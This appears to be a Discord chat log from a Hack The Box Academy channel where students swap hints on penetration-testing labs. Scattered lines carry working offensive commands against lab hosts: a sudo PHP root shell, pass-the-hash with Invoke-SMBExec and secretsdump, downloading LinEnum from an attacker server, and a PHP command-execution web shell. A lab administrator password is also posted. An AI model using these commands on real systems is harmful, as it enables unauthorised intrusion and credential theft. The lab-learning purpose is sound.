#modules
Nope. I just moved to other module
Damn. I will try to reset and try again
If you get it, please let me know
are you running it as admin
Yeah when I used RDP i tried both running cmd as admin and running it from there but also right clicking mimikatz and running as admin.
I went another way around the task and solved it. I used impacket to do the PTH for Administrator and then opened a PS session and ran mimikatz, then execute sekurlsa::msv
I am almost finished with the Linux privilege escalation! Having a hard time finding flag5!
if you're running as admin and the user has the rights it wouldn't return access denied
oh nvm got it
I am trying to upgrade the shell with the busctl commands but nothing happens... how do I know that I'm running the program correctly?!
type whoami
or id
I got the stable shell, now I want to elevate to root
got it 🙂
thanks anyway!
wait i do wget <ip address>/LinEnum.sh
but it says access denied
with python3 -m http.server 80
thought i had it 😔
uhh it shows me this
thats it
and the error from the server is
this
oh
Is the Skills Assessment in Session Security Broken? I am trying to access http://minilab.htb.net/submit-solution?url=http://<MYIP>:<PORT> however i get an error something went wrong.
hm alright
i see
imma try elsewhere
is there like a certain place i should be executing it or it doesn't matter where?
/tmp/ for downloads usually works
As it's world writeable
alright
o thank you
You were trying to write to a user's home
hm
I tried running ||Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "dir" -Verbose || through my RDP session but it gives me this.
I've tried numerous other ways but I believe that it must be run from the "initial access" machine.
holy shit it worked
now what?
the scan is complete
do i execute something with sudo?
or will that still not work
lemme try
nvm
Chmod +x
yup
and then ./LinEnum.sh yes?
You need to make it executable
Yes, sudo not required
Then just analyze the info, for what's probable
alright
lets see
interesting files :
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl
wait meaning of probable?
accessed?
oh i see
thank you
anything i should be looking for? like config files or?
oh alright thank you
a lot of config files
hmmmm
give me another hint about that script
if possible
oh
its uhh cracking into HTB/getting started/knowledge check
Will try, thanks!
oh nah
oh wait you mean
sudo -l?
ye i did just a little before you asked
im trying to remember the script
was it like
sudo -u <user> "<path shown>"
i dont remember it
(ALL : ALL) NOPASSWD: /usr/bin/php
alright thank you
yeah thats the first thing that came up
smb signing required from the client so cross-protocol not possible there, webdav not running, still stuck a bit
do you still need help
i tried using this one CMD="/bin/sh"
sudo php -r "system('$CMD');"
but seems like its wrong
do i have to replace anything?
oh shit wait
RAAAAAHHHH
i think i did it
FUCK YEAH DUDE
HOLY SHIT THIS TOOK A WHILE BUT IT WAS FUN AS SHIT
alright tomorrow im starting the basic toolset
That dopamine hit that keeps bringing me back for more. 😂
😂
that was exciting dude
shit was actually hella fun
hell yeah
if it was easier it wouldnt be as satisfying
For NTLM Relay Attacks - Skills Assessment, the second question/task is to compromise the BACKUP01 server. My understanding is below, but I'm stuck on moving forward
||I have used the mozhar account via ntlmrelay/responder to get smb access to the backup01 server, but couldn't write files and didn't see anything that helped so far. I have the sql_ftp_test account which provides me domain access, but I seem to be unable to coerce any auth with coercer/printerbug/petitpotam/etc, and unable to drop files anywhere. Noticed signing is disabled but not picking up any meaningful auths without coercion either. Tried adding shadow creds to mozhar but denied. Clients require signing so coercing auth from smb to cross-protocol isn't helpful. What am I missing?||
wait was that like basically how hackers get into something related to databases or some shit like that?
Any really good with proxychains? I'm trying to load a website via proxychains but it's not loading
I don't consider myself an expert, but I can try to help you
Currently I'm in an internal network and I know I have network access because I can run proxychains nmap from my attacker host successfully
Not sure what I am doing wrong
I've sent you a DM, lets talk there to avoid flooding the chat
you can create something with the current access you have
dont think just user accounts.
Hey guys I am currently following the Windows Privilege Escalation module and on the SeTakeOwnershipPrivilege tab
The question states:
Leverage SeTakeOwnershipPrivilege rights over the file located at "C:\TakeOwn\flag.txt" and submit the contents.
I tried the various methods listed in the lesson but they don't seem to work and i am running out of any other ideas.
I thought maybe it has something to do with not having the SeTakeOwnershipPrivilege rights so maybe a bug?
I created a || computer account || and didn't notice any new access/capabilities from there (edit: I can coerce now but insuff privs to set shadowcreds / etc for those servers)
Hey everyone, I am having issues with the privilege escalation on the nibbles box, || when I try to sudo the program to get root access it just gives an error saying unknown:I need something more specific and says it didn't found [[||
Can somebody help me understand why in the module Active Directory Enumeration & Attacks, section Bleeding Edge Vulnerabilities, when using the PetitPotam approach, he uses the LM+NT hash when dumping secrets, how he obtained the LM hash? I can't find it anywhere (I know that the NT hash is from calling /opt/PKINITtools/getnthash.py)
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c...04fe:313b6...b4ba
Edit: LM hash isn't required, but still...
ok, when you coerce, make sure you have the right IP's , you can get something from this
quick question, you know how every time you hack a HTB lab, you have to connect to the vpn given. How does that work in the real world, like do you have to be connected to a certain vpn to hack or.. Like why do we have to connect to the hack the box open vpn to hack the lab.
Because the labs are hosted privately
And it depends
You can't just access the 10.129.x.x private network that the labs are on, as again private network as opposed to a public ip and port of some web modules
How does it work in the real world?
It depends - you may have a dedicated connection to do the assessment. you may be working through a dropbox, or the company allows your testing device through their VPN/Zscaler/firewall, etc.
For example
Or you may be tasked with breaking in through their external web server
allegedly lets say I wanna hack my neighbour can i just do it from my vpn
You need some form of access to their network
You can't just "hack them"
So you can't do it remotely like you do on HTB, like if you get their ip can you do it
if you have their ip*
You'd need more than the ip
You'd need an exposed service to break in through
But most home networks aren't set up the same way as a corporate network
In a home network each device is its own entity
As opposed to an office where they belong to the same entity
I also suggest refraining from making illegal hypotheticals
How else would I phrase it legally - for my own knowledge i wanna know out there how it really works
You have some scope that allows access either to their exposed web server, directly to their internal network, somewhere in between
There's not much to figure out about how it really works; from the perspective of Academy, the tester (you, the student) has been granted access to the exposed web servers within their DMZ (10.129.x.x). Some of those servers have access to a separate VLAN network (172.16.x.x --> 172.31.x.x) in which more sensitive servers and workstations may reside
Can you not encrypt a file on Linux, then decrypt on windows?
And vice versa.
ofc you can
I am on the footprinting module in the IPMI section. I got the user's hash. I am trying to crack it with hashcat. I put just the hash in a file called "ipmi.txt". The syntax I am using is "hashcat -m 7300 ipmi.txt /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt". The contents of my hash match the example on the hashcat wiki. The error I am getting is "Hash 'ipmi.txt': Separator unmatched
No hashes loaded.
"
I tried adding in the username:hash
but that didnt work either
This website shows you example formats for various encryption types. https://hashcat.net/wiki/doku.php?id=example_hashes
it should look something like the example they provide 08b017f3628b9835c748521e412429c9:f3450000df540000cdd981b0b3441be8774a61e69321291891a29a0c5fdac3f06194bd2c29fa5246000000000000000000000000000000001400
But not with the methods shown in the file sending module?
Sorry not sure what you're asking.. I don't recall any encryption/decryption related stuff in the file transfer module. I could be wrong because it's been a while since I did it. Do you need help with a section in that module?
The protected files section.
I completed the module, but I noticed we encrypt/decrypt with powershell, then encrypt/decrypt with openssl on Linux.
The whole point of encryption is to send from one to the other.
ahh yeah
so you answered yourself right there
both linux and windows can encrypt/decrypt
you can also just install openssl in windows
that powershell script that it provides, you can use -mode decrypt to decrypt instead of encrypt.
```powershell
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Path "example.txt.aes"
```
thats the format it is in currently
Right.
We can encrypt with that powershell script then decrypt with that powershell script.
I’m saying can we encrypt with powershell then decrypt in Linux. And vice versa.
You mentioned installing openssl on windows, but we may not have the ability to install programs.
yeah you can use the PS script to decrypt aes
you can also just write your own powershell script. powershell can pretty much do anything, it's .NET under the hood
It didn’t work when I tried.
Maybe I didn’t enter it correctly.
https://academy.hackthebox.com/module/113/section/2164
why isn't the ftp letting me to download the jar file? any help please
never mind gotta enable file download in internet explorer zone settings
I ran it on the pwnbox instead of my kali vm with the same exact hash, same exact command. Literally copied and pasted everything over. It worked on the pwnbox. Weird
anyone else with kali 2024.2 have issues running hashcat?
i run hashcat on my main workstation instead of my vm, so i can utilize those nvidia cuda cores lmao
i noticed it's running the latest version compared to the pwnbox which is a version older
doesn't matter, the hashes will be the same
make sure you've copied the whole line from the output
I did. I copied everything from my kali VM where i kept getting an error about not being : separated. To the pwnbox and everything worked. Didn't change a thing except for the VM
try manually typing, i've only ever seen that error if the hash isn't correct. also double check the mode you used, if you chose the wrong mode it will cause that error to because it's expecting a different hash format.
since you copied it there could be some invisible characters
i had to uninstall the newest v6.2.6 and install v6.1.1
got it working on my kali vm after that. /shrug
I’m still trying to figure out how to encrypt a file on Linux, then decrypt it on windows…
which part can't you do
The decryption.
If you encrypt a file with openssl on Linux, you can’t decrypt it with powershell.
Or vice versa.
what encryption type
I assume the type in the module is aes.
Try this in linux:
```bash
# OpenSSL: AES Encryption Command
openssl enc -aes-256-cbc -salt -in /path/to/file.txt -out /path/to/encrypted_file.txt -k YourStrongPassword
# OpenSSL: AES Decryption Command
openssl enc -d -aes-256-cbc -in /path/to/encrypted_file.txt -out /path/to/decrypted_file.txt -k YourStrongPassword
```
try this in powershell:
```powershell
# PowerShell: AES Encryption Script
$InputFile = "C:\path\to\file.txt"
$OutputFile = "C:\path\to\encrypted_file.txt"
$Password = "YourStrongPassword"
$Aes = New-Object System.Security.Cryptography.AesManaged
# Key: the password padded/truncated to 32 bytes (AES-256); IV: 16 zero bytes
$Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight(32).Substring(0, 32))
$Iv = [byte[]](1..16 | ForEach-Object {0})
$Aes.Key = $Key
$Aes.IV = $Iv
$Encryptor = $Aes.CreateEncryptor()
$FileStream = [System.IO.File]::OpenRead($InputFile)
$EncryptedStream = [System.IO.File]::Create($OutputFile)
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($EncryptedStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$Buffer = New-Object byte[] 1024
while (($BytesRead = $FileStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $CryptoStream.Write($Buffer, 0, $BytesRead)
}
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStream.Close()
$EncryptedStream.Close()

# PowerShell: AES Decryption Script
$InputFile = "C:\path\to\encrypted_file.txt"
$OutputFile = "C:\path\to\decrypted_file.txt"
$Password = "YourStrongPassword"
$Aes = New-Object System.Security.Cryptography.AesManaged
# Same key and IV derivation as the encryption script above
$Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight(32).Substring(0, 32))
$Iv = [byte[]](1..16 | ForEach-Object {0})
$Aes.Key = $Key
$Aes.IV = $Iv
$Decryptor = $Aes.CreateDecryptor()
$FileStream = [System.IO.File]::OpenRead($InputFile)
$DecryptedStream = [System.IO.File]::Create($OutputFile)
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($DecryptedStream, $Decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$Buffer = New-Object byte[] 1024
while (($BytesRead = $FileStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $CryptoStream.Write($Buffer, 0, $BytesRead)
}
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStream.Close()
$DecryptedStream.Close()
```
2 scripts in that block, one to encrypt one to decrypt
let me know if it works
powershell is just .NET under the hood so you can do whatever
lol I’m not sure you’re understanding my issue.
I can encrypt and decrypt on the same system as you’ve just shown.
The point is to encrypt on one system then decrypt on the other system.
well maybe i just don't get what you're asking then. you said there wasn't a way to encrypt/decrypt in windows and linux.
yo any one know the answer to this question?
You probably didn't get an answer because you didn't include the module or section. You also didn't provide the OS, so we have no idea which command we could give you a hint with.
No no.
The module is about file transfer. (Send a file from Linux to windows) or vice versa.
You have to encrypt a file on Linux, then send the encrypted file to windows and decrypt it there.
i understand that
its on Current Path
Information Security Foundations | Introduction to Windows Command Line
You showed how to encrypt then decrypt on the same system.
i provided you 4 things. 1) a powershell script that encrypts in aes. 2) a powershell script that decrypts aes. 3) an openssl command that encrypts in linux with aes, and 4) an openssl command that decrypts aes. being able to encrypt and decrypt on both systems means you can encrypt on one (linux), transfer the file, and decrypt (windows) on the other box
correct, i showed you how to both encrypt and decrypt on both systems
so what am i not understanding about the problem
now that you can encrypt with linux, transfer, and decrypt in windows, what is the problem you are having
the file transfer?
Sir lol…
You can’t decrypt a file in powershell that you encrypt with openssl.
Is that not the script given in the module?
I’ll try your script.
Module: Attacking Enterprise Networks, Section: Exploitation and Privilege Escalation, Question: When I used ligolo-ng/proxychains to pivot into internal network, the host with DNN website hosted, the side bar containing "Settings" doesn't seem to load, can anyone help to troubleshoot this :/
The one with the settings bar was taken from course materials
So, I would make 2 separate ps1 files, then import them as modules?
call the script and pass the necessary parameters
```powershell
.\DecryptFile.ps1 -InputFile "C:\path\to\encrypted_file.txt" -OutputFile "C:\path\to\decrypted_file.txt" -Password "YourStrongPassword"
```
i take it you're logged in as ||Administrator:D0tn31Nuk3R0ck$$@123|| ?
yes i am
the first picture is the one that im currently looking at
there is no icon on the left bar
^
after you log in , try navigating directly to http://172.16.18.20/Activity-Feed/userId/1
still the same issue 😦
try disabling your extensions, try private mode, try another browser, try CTRL + F5 to refresh and clear your cache
i highly doubt it's due to your tunnel to the site, if so don't use that way and use netsh or something to port forward
or try zooming in / out
or try searching for Settings
with the little magnifying glass icon
give me a few minutes and i will fire up the lab
It shows no result found
let me try this too
go back to the root of the website . So just http://172.16.8.20
and click the gear icon
yeah that too
np 😉
I’m getting an error…
paste the script into chat gpt, then paste the error see if it can fix it
i dont know powershell that well
i'm positive it can be done though
the provided (from the module) script has parameters to decrypt not sure why it wont work for you
Have you tried it yourself?
you're missing command line arguments i think
.\DecryptFile.ps1 -InputFile "C:\path\to\encrypted_file.txt" -OutputFile "C:\path\to\decrypted_file.txt" -Password "YourStrongPassword"
oh yeah that too lol
All that stuff is inside the script.
I am on the Linux Fundamentals / Filter Contents Module / Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. I cannot seem to get the right number of unique paths. I have || 20 || utilizing a series of ||grep, awk, and cut||. I appreciate any assistance with this. Thank you.
[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?
I had a hard time with that also. I forgot which command I used but one of these may work.
The third question in the HTB academy module Linux Fundamentals, in the Filter Content section, " Use cURL from your Pwnbox (not the target machine) to obtain the source code of “https://www.inlanefreight.com” website and filters all unique paths of that domain. Submit the number of these paths as the answer." I am stuck, I tried filtering out ...
hello amigos. I have difficulty in understanding this statement (SSTI example 3 module):
The application successfully evaluated this expression as well. According to PortSwigger's diagram, we are dealing with either a Jinja2 or a Twig template engine. That being said, the fact that {{7*'7'}} was evaluated with the application returning 7777777 means that Jinja2 is being utilized on the backend.
How he can jump from one sentence we are in Jinja2 or Twig and then just say it is jinja2. Would it be possible to find this info from wappalyzer for example?
Im not familiar with web apps but will the two engines evaluate the bracketed operation differently?
7 times a character of 7
Im looking at twig operand examples none of them show multiplying a character it’s always between two numbers
I assume there’s going to be errors if it’s in twig
Whereas jinja has no issue because this is valid in python
Here is the answer from HackTricks
In twig, {{7*'7'}} = 49
Where in Python '7' is interpreted as a char and not a digit
Interesting it auto recognise it as int
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 instead of rdp i want to use evil-winrm i replaced port 3389 with 5985 but i can't use evilwinrm
i was able to use rdp
applying the pivoting module knowledge in AD skill ass 1
Are you sure your connectAddress is correct ?
above command is from pivot module, i just use that command for reference here, real command has diff ip
Maybe this port isn't open on the target
i can rdp to other machine but that is so laggy, that's why i want to know why evil-winrm didn't work
oh
Or your winrm doesn't go on 8080 port
I can't help more as you are farther than me in your path
oh now it worked with evil-winrm
I'm practicing the HTTP Method: POST lab, I have connected to the HTB VPN successfully but unfortunately I can't login to the URL and when entering the credentials I'm having the above error. What could be the problem can anyone help me with this?
Hello , i am stuck on kerberos attacks ( Unconstrained Delegation - Computers ) question number 2 "5 Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt "
can anyone help me please
Hello, I am a university student pursuing cpts after my oscp, & I am struggling with htb academy's domain fuzzing section. Bruting subdomains and vhosts has not been an issue for me in the past. However, upon using ffuf or wfuzz against this infrastructure the only thing i come upon are errors.
https://academy.hackthebox.com/module/54/section/502
Has anyone else experienced this issue before?
I am unsure why i cannot complete this section after coming back to it for 2 days now. I have added the target and its respective ip to /etc/hosts & ran various ffuf/wfuzz commands against it but receive errors in the end.
i feel like the infrastructure is broken but i could very well be wrong
Heyo, not really looking for help but just wondering where i can make suggestions about some content in the File Transfers > Catching Files over HTTP/S.
The module states that it will cover creating a secure webserver for upload operations but then proceeds to cover the subject only in HTTP.
I kind of feel this is a ton more work than just using the python uploadserver module as described earlier in the module and without the benefit of actually being secure.
On a side note, would anyone be free to dm/chat about modifying this to actually run over https and what steps it would require?
There is a lot of example out on the internet
https://realpython.com/python-http-server/
There is a section explaining how to run it securely as well
Thanks for the hasty reply 🙂 i'm well aware of the python https stuff but i was hoping to concentrate more on nginx and expand on what i was learning in this section of the module, and as previously stated i just wanted to make a suggestion that the module was not in fact covering secure http communications. I have figured it out now and got it working over https but again thanks for the assist 🙂
#1234357888114364508 is probably the way to give spelling mistakes or missing content. Doesnt mean they will add it at the end of the day
oh perfect! thank you i thought that was something else entirely different
Is winrm even running on the system you're trying to access?
ofc
now it runs, i had to reset the machine, these machines are buggy
I'm doing file inclusion module and sometimes we need the base64 encode some of the strings such as echo '<?php system($_GET["cmd"]); ?>' | base64 for data wrappers
why is that tho? why do we have to base64 encode the strings?
Because of how the backend interprets it
Is it only for Data Wrappers? Because for input and expect wrappers we don't need to encode the strings
uhh is it wrong if i executed nmap -sV <target>
instead of very specific filters?
i still found what i needed to answer the questions but just asking
I guess it's not wrong. You don't need very specific filters unless its necessary
but learn why and where to use others for specific tasks
Not really
It's a thing you can do
oh alright thats good
just making sure
It's not like it's running any malicious script
ye
hmm
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
on enumeration with nmap
i tried using nmap -sV -A <target>
but i havent gotten the flag
must be wrong then
Did you check the version column?
Also reminder, tell us what module and section you're working on
Firewall and IDS/IPS Evasion - Hard Lab
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-18 09:03 EDT
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 09:04 (0:00:00 remaining)
Nmap scan report for 10.129.159.59 (10.129.159.59)
Host is up (0.064s latency).
Not shown: 869 closed tcp ports (conn-refused), 129 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 71:c1:89:90:7f:fd:4f:60:e0:54:f3:85:e6:35:6c:2b (RSA)
|   256 e1:8e:53:18:42:af:2a:de:c0:12:1e:2e:54:06:4f:70 (ECDSA)
|_  256 1a:cc:ac:d4:94:5c:d6:1d:71:e7:39:de:14:27:3c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
oops
thought it would look much cleaner
wah wrong
brother answer the damn question
Anyone for a little nudge on the DACL II skill assessment? Specifically Q2. Q1 went ok, and I think I found most parts for Q2 but I'm still missing a piece. Been going over all the material again but still not seeing it 😅
Firewall and IDS/IPS Evasion - Hard Lab
enumeration with nmap
basic toolset
You need to do the evasion techniques described in the reading
Where?
here
Missed it behind your copy/paste log
ye
Anyway
There's a section dedicated to evasion, you'll also need to scan all ports to find what you're looking for
-p-?
You will need to also use netcat once you find the right port
oh
netcat got it
But if you don't do the evasion, you won't find it
yeah i got you
imma take a look at it rn
And if you trigger too many alerts. It'll block you and you'll need to reset the lab
There are quite a few steps that you need to go through in that lab to get to the answer but its all stuff you've covered.
imma take a look on previous modules
Its all covered within the footprinting module.
how u all remove extra space and line from hashes , tr cut sed or awk
or vi
bruh i have learned all of them, sometimes i think why i had to learn all the methods
I've just finished the parts on password spraying in the AD Enumeration & Attacks module. It doesn't talk about how to pick a password for password spraying though. Y'all got any good advice for this?
EGIRL PARADISE YOOOOOO
@haughty stirrup
For Find The Easy Pass - how to run the zip file on mac m1
so since netcat
do i have to do that SYN scan?
hello, im having a hard time understanding what broadcast address and network address are? and whats their purpose in the subnet?
Scan first to find the right port first.
Network address defines what systems it can talk to, broadcast would send packets to all devices on that subnet
how do i know which is the right port? 😭
will it show me something like a version or whatever
In a /24, 192.168.0.0 and 192.168.1.0 are two different networks
It will stand out
alright
I suggest not doing a script scan to make it cleaner
Modules never disappoint
What module?
so a network address is unique to each subnet? and how exactly can i find out how they look for example the ip is 192.168.10 and subnet is 255.255.0 because there are 2 slots reserved for them?
255.255.255.0 is the mask
@haughty stirrup I need help.
Also if you're going to try and use examples use all 4 octets, not 3
yeah my bad im going to try to explain better
If you know the mask you can find out the network
Its a challenge in the beginners track called Find The Easy Pass https://app.hackthebox.com/challenges/5 sorry let me know if i am asking my doubts in the wrong room
Wrong room this channel is for academy modules, #challenges (read and follow #welcome)
oof
that shit was confusing but alright
had to google a bit for the netcat part
not "a bit" but yk
hopefully there is a netcat introduction module
There's not
dang
It's a basic network connection tool that's not really all that complex
listening and such?
I read the article but still i dont understand why the subnet mask is 255.255.255.0 in the case of the ip address 192.168.10? doesnt it go from 192.168.0-254?
hmm
Listening and connecting
very nice
192.168.0.1-192.168.0.254 are addressable
.0 is the network, and .255 is the broadcast
what is this red team role
oh yeah i think i understand. so the original ip i gave was missing an octet (because u said to use all 4), so in theory such an ip address can't exist in the first place and therefore a subnet with 3 octets can't exist too? 255.255.0 can't even exist right? and also does the network address have any purpose or is it just an identifier, like for example 192.168.0.255 broadcasts and what does 192.168.0.0 do?
Network is an identifier, broadcast sends packets to the network
like a hub?
No
A hub is a switching device
And connects multiple subnets
The broadcast only sends on its network
i think i meant if the broadcast sends a signal to all devices on the network similar to what a hub does and doesnt have any intelligence to know what ip is meant to receive the packet?
A hub is something different
well i tried using it as an analogy
Yes it's similar.
Anyone know anything about this?
Think of a simple default password
Any suggested reference/resource?
Alrighty, thanks. A little concerned I won't guess the right password to use for a password spraying attack if it's on the CPTS exam tho 😂
@next bronze got any suggestions for a solid resource?
I'm not at that module yet, but it seems like password spraying is different from brute forcing in that you try a single password against a bunch of user account names once each. The password used in a spray is described as a "default password" which would imply this attack works best against software packages that have some kind of default. Am I thinking about this right?
sorry guys, I have a private little ctf that I need help with...how can I receive help? it should be really easy for you guys 😄
nope, you don't even do it irl because it will usually miss, the only time it's reasonable to do it is when you have solid intel on a potential password
hey guys, I am stuck in the Attacking Thick Client Applications section in Attacking common application module, I couldn't find the file that have the magic bytes MZ in x64dbg
Ah, alrighty. Noted.
Ah, so, like that one password that everybody in the office uses for everything because that's what they were taught to do. That sounds good too.
yeah only when you know what it could be, otherwise there's pretty much no chance of success
Enum the new user script for default password
yeah something like that
ChangeMe123!
Oh, that's helpful. Thanks.
There's usually some admin policy somewhere
well usually if you're looking for a foothold you won't find those
unless there's some ctf fuckery going on
English
I am trying to make the binaries for kerbrute, as laid out in the AD Attacks module and keep getting this error when trying to make all. I really don't know what to make of it. Anyone else getting this error?
it means go isn't installed
go being the programming language
Ok that's what was I thinking, definitely thought I had it installed though, thanks
Hey i want some advice
ask google /s
Ive been going through a few machines on HTB and they're labeled as easy and it's pretty much insane for me, i just couldn't find out how to complete each step
Google, research, but this channel isn't for machines
read and follow #welcome to access more channels
Hello, why does multicast only work with the SSDP protocol? can't it be used with http + udp instead? and why can it only be utilized with specific ipv4 and ipv6? (i already searched in google but couldn't find an answer to these specific questions)
Multicast works with more than SSDP. There are situations as well where one would utilize multicast, HTTP and UDP as well. For example, watching a streamer on twitch. We'd use HTTP to connect, The server instructs the client to join a specific multicast group, (IGMP for IPv4 or MLD for IPv6). Then the server starts sending packets over UDP. We use UDP because it is faster and more efficient for continuous transmission of large volumes of data
thanks, so its not limited to just ssdp
Guys, is there any ways to earn cube for free ?
Referral I think?
Np, and yes that’s correct! Multicast is a method of data transmission to multiple clients. While, SSDP uses multicast for service discovery
oh tysm lemme try
The person you refer has to purchase cubes in order for you to get cubes iirc.
Hello again, I feel like I ask a lot of questions here, but this is really the only way for me to get answers and sleep at night. https://academy.hackthebox.com/module/116/section/1512 in this module, I couldn't get the flag. Let me explain what I did so far: I used subbrute and found the ns1 server and tried to dig it using "dig axfr ns1.. @IP" but there is nothing, sometimes I get connection timed out and sometimes it doesn't even work, I need to know if I am on the right path or not. also if possible, a little bit more detailed guide, because I am lost. Oh also, I still don't get what the point of using resolver.txt in subbrute is. Any help appreciated
I can only help with resolver.txt. Have you read subbrute's github page? It mentions resolver.txt in the first paragraph of the readme.md. How do you understand the function of resolver.txt currently?
tbh I checked readme.md now, but didn't see anything about resolvers.txt. Also it is full of ip addresses in the github repo, idk why. I really don't understand the point of it.
Ok, you're right. It mentions using "open resolvers" to avoid rate limiting. resolvers.txt contains a list of DNS resolvers to use.
https://github.com/TheRook/subbrute
Do you have an additional question?
ohhh alr, I get it now.
no, thanks for help, there is no other question about subbrute.
some modules have ez ans
A lot of the sqlmap ones are easy
greetings, can someone give me a hint for the footprinting medium challenge. i found creds for a username with letter a, and a password for the ssms sa user. it seems that the user with letter a doesn't have access to the database. i found another user with letter d but i don't know its password. so i enumerated both shares and successfully made an rdp connection but what did i miss and where to look for it?
Perhaps the sa password is reused
i don't believe it haha, thanks
I have a question as to why this is relevant to batman.
now i can stop hydra at 10k combinations
Maybe he just likes superheroes
There's generally not a lot of rhyme/reason to the chosen passwords
Haha, thanks, but with over 9 w of data, ssh would be down under normal circumstances!
Don't attack ssh 😉
No, I read in other information, is SSH hit, Ftp is able to carry on blasting?
how do you guys send images tho? it dont let me do that
Sorry I kinda forgot, you need to be tied to an account to send photos it seems!
Oh okay, thanks partner. let me do that
Read and follow #welcome
Delete the images bc spoilers
But ssh is slow af; attack a different port from ssh is what I meant
But the point is you can bruteforce a different service; the question doesn't state you have to attack ssh
Just to bruteforce his pw, then log in with ssh
I also suggest saving any username:password combos you find
Okay, I'll try.
And with some other services you can use as many as 48 threads
File inclusion automated scanning, the page doesn't give any parameters or anything other than just a plain ip address but when we fuzz it it adds index.php. where is it coming from? I mean why did we add index.php and not something else
like x.x.x.x:1010 this is the page and there's no button or link no nothing but we gonna ffuf it and url is being x.x.x.x:1010/index.php?FUZZ=value
i know it's a dummy question but i didn't get it
Can you try to use another dictionary? Or make sure the syntax of the command is not wrong, if I remember correctly you could try using the view
Yeah I was able to find the view and its value. what i didn't understand is where index.php is coming from, because it seems like we added it out of nowhere
index.php is the default page, don't bother with that!
oh okay lol, thanks a lot!
refueling
Is my current thinking correct?
I don't seem to have any luck with the official account password I was given, I haven't done the hash yet.
you can loop over usernames instead of passwords for a more effective brute force
Did you get it? Im having the same problem, nothing is running on port 8888
Can anyone give me a nudge?: AD Enumeration & Attacks - Skills Assessment Part II - [Q 7] "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host".
I'm trying impacket-mssqlclient
once you login with mssqlclient. will need to get crackin with xp_cmdshell and move some tools that can help you
i used nc to get a "cleaner" shell to work through it
nc.exe
many ways to crack an egg
dont get hung up on one way for priv esc, if you having troubles, use the next one
haha
but there are tools referred to by having a certain SE...Privilege
they don't explicitly tell you how to use those tools in the module though
yea, which i think was a miss on their part.
but RTFM, haha
the tools are not that bad, but can be intimidating imo if you're new to it
they're well enough documented
just threw it at /feedback
ok. will do later
thanks bro
I'm doing the footprinting medium lab. I've RDP'd in. Logged into SQL query... and can't figure out the query to get the HTB pass... I feel like I'm so close yet the accounts table populates nothing.. I feel like I have the privileges and am looking in the right area... but idk
well if you're using the GUI app; just click around otherwise google enumeration stuff with SQL
mission click around initiated
you can also run a query from within the GUI fwiw, but if you don't know SQL queries -- just click around
I mean I know em' enough. There has to be some trick or something
SELECT * from dbo.accounts just shows me columns
even do select count(*) from dbo.accounts; and shows 0
Maybe you're looking in the wrong places
Or maybe you're misunderstanding
Do you mean it shows you the columns with info?
Perhaps you can look where you need to be
Not really
precisely
Iirc that's just a default table
you're a default table
Mssql is a mess
Mysql/MariaDB is much cleaner
Most enum commands work the same/similar though
yeah, I've used mysql much more. I definitely learned some things tho
side note, how can I get vim to let me copy paste
pasta why's it no work
Google my friend or even vim-tutorial
Hey all, I have what is hopefully a quick question about module 54 section 485 (Directory Fuzzing). I've looked around in this server and on google, and I really just can't get a straight answer... where do you find the results of running ffuf? Seems so stupid obvious but I'm just not seeing anything
Are you getting spammed with stuff back?
Module: AD Enumeration & Attacks
Section: Credentialed Enumeration - from Linux
I don't recall when we identified the user svc_qualys as a domain admin. I do recall obtaining this user's password using LLMNR/NBT-NS poisoning in this section, but that's it. Anyone got any idea?
it pretty much tells you in the paragraph, you need to obtain creds from memory
what tools can get credentials from memory or impersonate people?
No, that's referring to the enumeration we performed above this paragraph. But it's saying that we've previously identified the account as a domain admin.
The tool I used to perform the LLMNR/NBT-NS poisoning earlier to obtain that user's credentials was Inveigh.
so that's what it's referring to then?
So, what they're saying is that if I go back and run net localgroup on that account in the section where we compromised it, it'll say that the account is a domain admin?
no, net localgroup will only return the local group members to you
How do I check if a user's a domain admin then? Cuz it hasn't specified so far in the module.
Guys help me
What is the account's cleartext password?
This is of IPMI of Footprinting
How to extract clear text password for this
You can use /domain. like this net group "Domain Admins" /domain
Do I replace /domain with the name of the domain? For example, /inlanefreight.local?
no.
I'll give it a go.
help me
i believe you can use net group /domain /domain:dc1.otherdomain.com, but i'm not sure
going to DM if that's okay; this channel doesn't seem to like the message I'm trying to send haha
ok
guys help me with this
Doesn't the module go over it? You can crack stuff with various tools
Do you have the hash?
